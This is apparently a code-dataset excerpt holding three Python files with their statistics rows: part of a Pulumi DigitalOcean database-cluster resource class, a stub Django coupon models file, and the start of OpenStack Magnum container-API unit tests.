pulumi.set(self, "maintenance_windows", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> Optional[pulumi.Input[int]]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@node_count.setter
def node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "node_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password for the cluster's default user.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Network port that the database cluster is listening on.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="privateHost")
def private_host(self) -> Optional[pulumi.Input[str]]:
"""
Same as `host`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_host")
@private_host.setter
def private_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_host", value)
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@private_network_uuid.setter
def private_network_uuid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_network_uuid", value)
@property
@pulumi.getter(name="privateUri")
def private_uri(self) -> Optional[pulumi.Input[str]]:
"""
Same as `uri`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_uri")
@private_uri.setter
def private_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_uri", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[Union[str, 'Region']]]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[Union[str, 'Region']]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[Union[str, 'DatabaseSlug']]]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> Optional[pulumi.Input[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@sql_mode.setter
def sql_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_mode", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def uri(self) -> Optional[pulumi.Input[str]]:
"""
The full URI for connecting to the database cluster.
"""
return pulumi.get(self, "uri")
@uri.setter
def uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uri", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Username for the cluster's default user.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
class DatabaseCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a DigitalOcean database cluster resource.
## Example Usage
### Create a new PostgreSQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="11")
```
### Create a new MySQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mysql_example = digitalocean.DatabaseCluster("mysql-example",
engine="mysql",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="8")
```
### Create a new Redis database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
redis_example = digitalocean.DatabaseCluster("redis-example",
engine="redis",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="6")
```
### Create a new MongoDB database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mongodb_example = digitalocean.DatabaseCluster("mongodb-example",
engine="mongodb",
node_count=1,
region="nyc3",
size="db-s-1vcpu-1gb",
version="4")
```
## Import
Database clusters can be imported using the `id` returned from DigitalOcean, e.g.
```sh
$ pulumi import digitalocean:index/databaseCluster:DatabaseCluster mycluster 245bcfd0-7f31-4ce6-a2bc-475a116cca97
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DatabaseClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a DigitalOcean database cluster resource.
## Example Usage
### Create a new PostgreSQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="11")
```
### Create a new MySQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mysql_example = digitalocean.DatabaseCluster("mysql-example",
engine="mysql",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="8")
```
### Create a new Redis database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
redis_example = digitalocean.DatabaseCluster("redis-example",
engine="redis",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="6")
```
### Create a new MongoDB database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mongodb_example = digitalocean.DatabaseCluster("mongodb-example",
engine="mongodb",
node_count=1,
region="nyc3",
size="db-s-1vcpu-1gb",
version="4")
```
## Import
Database clusters can be imported using the `id` returned from DigitalOcean, e.g.
```sh
$ pulumi import digitalocean:index/databaseCluster:DatabaseCluster mycluster 245bcfd0-7f31-4ce6-a2bc-475a116cca97
```
:param str resource_name: The name of the resource.
:param DatabaseClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DatabaseClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DatabaseClusterArgs.__new__(DatabaseClusterArgs)
if engine is None and not opts.urn:
raise TypeError("Missing required property 'engine'")
__props__.__dict__["engine"] = engine
__props__.__dict__["eviction_policy"] = eviction_policy
__props__.__dict__["maintenance_windows"] = maintenance_windows
__props__.__dict__["name"] = name
if node_count is None and not opts.urn:
raise TypeError("Missing required property 'node_count'")
__props__.__dict__["node_count"] = node_count
__props__.__dict__["private_network_uuid"] = private_network_uuid
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["sql_mode"] = sql_mode
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
__props__.__dict__["cluster_urn"] = None
__props__.__dict__["database"] = None
__props__.__dict__["host"] = None
__props__.__dict__["password"] = None
__props__.__dict__["port"] = None
__props__.__dict__["private_host"] = None
__props__.__dict__["private_uri"] = None
__props__.__dict__["uri"] = None
__props__.__dict__["user"] = None
super(DatabaseCluster, __self__).__init__(
'digitalocean:index/databaseCluster:DatabaseCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_urn: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
host: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
private_host: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
private_uri: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
uri: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None) -> 'DatabaseCluster':
"""
Get an existing DatabaseCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_urn: The uniform resource name of the database cluster.
:param pulumi.Input[str] database: Name of the cluster's default database.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[str] host: Database cluster's hostname.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] password: Password for the cluster's default user.
:param pulumi.Input[int] port: Network port that the database cluster is listening on.
:param pulumi.Input[str] private_host: Same as `host`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] private_uri: Same as `uri`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] uri: The full URI for connecting to the database cluster.
:param pulumi.Input[str] user: Username for the cluster's default user.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DatabaseClusterState.__new__(_DatabaseClusterState)
__props__.__dict__["cluster_urn"] = cluster_urn
__props__.__dict__["database"] = database
__props__.__dict__["engine"] = engine
__props__.__dict__["eviction_policy"] = eviction_policy
__props__.__dict__["host"] = host
__props__.__dict__["maintenance_windows"] = maintenance_windows
__props__.__dict__["name"] = name
__props__.__dict__["node_count"] = node_count
__props__.__dict__["password"] = password
__props__.__dict__["port"] = port
__props__.__dict__["private_host"] = private_host
__props__.__dict__["private_network_uuid"] = private_network_uuid
__props__.__dict__["private_uri"] = private_uri
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["sql_mode"] = sql_mode
__props__.__dict__["tags"] = tags
__props__.__dict__["uri"] = uri
__props__.__dict__["user"] = user
__props__.__dict__["version"] = version
return DatabaseCluster(resource_name, opts=opts, __props__=__props__)
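# Illustrative sketch only: the resource name below is a placeholder, and the
# ID reuses the example from the "Import" section of the class docstring.
#
# existing = DatabaseCluster.get(
#     "existing-cluster",
#     id="245bcfd0-7f31-4ce6-a2bc-475a116cca97")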
@property
@pulumi.getter(name="clusterUrn")
def cluster_urn(self) -> pulumi.Output[str]:
"""
The uniform resource name of the database cluster.
"""
return pulumi.get(self, "cluster_urn")
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
Name of the cluster's default database.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter
def engine(self) -> pulumi.Output[str]:
"""
Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> pulumi.Output[Optional[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
Database cluster's hostname.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseClusterMaintenanceWindow']]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> pulumi.Output[int]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@property
@pulumi.getter
def password(self) -> pulumi.Output[str]:
"""
Password for the cluster's default user.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Network port that the database cluster is listening on.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="privateHost")
def private_host(self) -> pulumi.Output[str]:
"""
Same as `host`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_host")
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> pulumi.Output[str]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@property
@pulumi.getter(name="privateUri")
def private_uri(self) -> pulumi.Output[str]:
"""
Same as `uri`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_uri")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[str]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> pulumi.Output[Optional[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def uri(self) -> pulumi.Output[str]:
"""
The full URI for connecting to the database cluster.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter
def user(self) -> pulumi.Output[str]:
"""
Username for the cluster's default user.
"""
return pulumi.get(self, "user")
@property
@pulumi.getter
def version(self) -> pulumi.Output[Optional[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
| 43.433031
| 252
| 0.636787
| 5,059
| 43,129
| 5.253212
| 0.05001
| 0.093957
| 0.074278
| 0.068709
| 0.90085
| 0.876881
| 0.843505
| 0.825105
| 0.817429
| 0.792106
| 0
| 0.003742
| 0.250272
| 43,129
| 992
| 253
| 43.476815
| 0.818154
| 0.356836
| 0
| 0.688433
| 1
| 0
| 0.099565
| 0.016508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166045
| false
| 0.026119
| 0.014925
| 0
| 0.283582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c01900793d8d4bd020a362d9e6a3ce77b4b3d4fa
| 118
|
py
|
Python
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2019-04-20T16:58:02.000Z
|
2019-04-20T16:58:02.000Z
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 6
|
2020-06-05T19:57:58.000Z
|
2021-09-08T00:49:17.000Z
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2021-09-10T18:29:28.000Z
|
2021-09-10T18:29:28.000Z
|
from django.db import models
class SystemCoupon(models.Model):
"""Placeholder for a platform-issued coupon; no fields defined yet."""
pass
class StoreCoupon(models.Model):
"""Placeholder for a store-issued coupon; no fields defined yet."""
pass
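# Hypothetical sketch of fields a coupon model like these might define; every
# field name below is invented for illustration and is not part of this app:
#
# class StoreCoupon(models.Model):
#     code = models.CharField(max_length=32, unique=True)
#     discount = models.DecimalField(max_digits=6, decimal_places=2)
#     valid_until = models.DateTimeField()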
| 11.8
| 33
| 0.737288
| 15
| 118
| 5.8
| 0.666667
| 0.252874
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186441
| 118
| 9
| 34
| 13.111111
| 0.90625
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
c0460a6773ed1087a9f3340e96f25b8e9017b58e
| 27,374
|
py
|
Python
|
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from magnum.common import utils as comm_utils
from magnum import objects
from magnum.objects import fields
from magnum.tests.unit.api import base as api_base
from magnum.tests.unit.db import utils
from oslo_policy import policy
import mock
from mock import patch
from webtest.app import AppError
class TestContainerController(api_base.FunctionalTest):
def setUp(self):
super(TestContainerController, self).setUp()
p = patch('magnum.objects.Bay.get_by_uuid')
self.mock_bay_get_by_uuid = p.start()
self.addCleanup(p.stop)
p = patch('magnum.objects.BayModel.get_by_uuid')
self.mock_baymodel_get_by_uuid = p.start()
self.addCleanup(p.stop)
def fake_get_by_uuid(context, uuid):
return objects.Bay(self.context, **utils.get_test_bay(uuid=uuid))
self.mock_bay_get_by_uuid.side_effect = fake_get_by_uuid
self.mock_baymodel_get_by_uuid.return_value.coe = 'swarm'
@patch('magnum.conductor.api.API.container_create')
def test_create_container(self, mock_container_create):
mock_container_create.side_effect = lambda x: x
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_set_project_id_and_user_id(
self, mock_container_create):
def _create_side_effect(container):
self.assertEqual(container.project_id, self.context.project_id)
self.assertEqual(container.user_id, self.context.user_id)
return container
mock_container_create.side_effect = _create_side_effect
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.app.post('/v1/containers',
params=params,
content_type='application/json')
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.conductor.api.API.container_create')
@patch('magnum.conductor.api.API.container_delete')
def test_create_container_with_command(self,
mock_container_delete,
mock_container_create,
mock_container_show):
mock_container_create.side_effect = lambda x: x
# Create a container with a command
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Stopped'
mock_container_show.return_value = container
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
self.assertEqual(1, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('My Docker', c.get('name'))
self.assertEqual('env', c.get('command'))
self.assertEqual('Stopped', c.get('status'))
# Delete the container we created
response = self.app.delete('/v1/containers/%s' % c.get('uuid'))
self.assertEqual(response.status_int, 204)
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.conductor.api.API.container_create')
@patch('magnum.conductor.api.API.container_delete')
def test_create_container_with_bay_uuid(self,
mock_container_delete,
mock_container_create,
mock_container_show):
mock_container_create.side_effect = lambda x: x
# Create a container with a command
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Stopped'
mock_container_show.return_value = container
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
self.assertEqual(1, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('My Docker', c.get('name'))
self.assertEqual('env', c.get('command'))
self.assertEqual('Stopped', c.get('status'))
# Delete the container we created
response = self.app.delete('/v1/containers/%s' % c.get('uuid'))
self.assertEqual(response.status_int, 204)
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_without_name(self, mock_container_create):
# No name param
params = ('{"image": "ubuntu", "command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.assertRaises(AppError, self.app.post, '/v1/containers',
params=params, content_type='application/json')
self.assertFalse(mock_container_create.called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_invalid_long_name(self, mock_container_create):
# Long name
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.assertRaises(AppError, self.app.post, '/v1/containers',
params=params, content_type='application/json')
self.assertFalse(mock_container_create.called)
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers(self, mock_container_list,
mock_container_show):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
mock_container_show.return_value = containers[0]
response = self.app.get('/v1/containers')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, sort_dir='asc',
sort_key='id')
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(len(actual_containers), 1)
self.assertEqual(actual_containers[0].get('uuid'),
test_container['uuid'])
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers_with_pagination_marker(self,
mock_container_list,
mock_container_show):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=comm_utils.generate_uuid())
container_list.append(objects.Container(self.context,
**test_container))
mock_container_list.return_value = container_list[-1:]
mock_container_show.return_value = container_list[-1]
response = self.app.get('/v1/containers?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_detail_containers_with_pagination_marker(self,
mock_container_list,
mock_container_show):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=comm_utils.generate_uuid())
container_list.append(objects.Container(self.context,
**test_container))
mock_container_list.return_value = container_list[-1:]
mock_container_show.return_value = container_list[-1]
response = self.app.get('/v1/containers/detail?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
self.assertIn('name', actual_containers[0])
self.assertIn('bay_uuid', actual_containers[0])
self.assertIn('status', actual_containers[0])
self.assertIn('image', actual_containers[0])
self.assertIn('command', actual_containers[0])
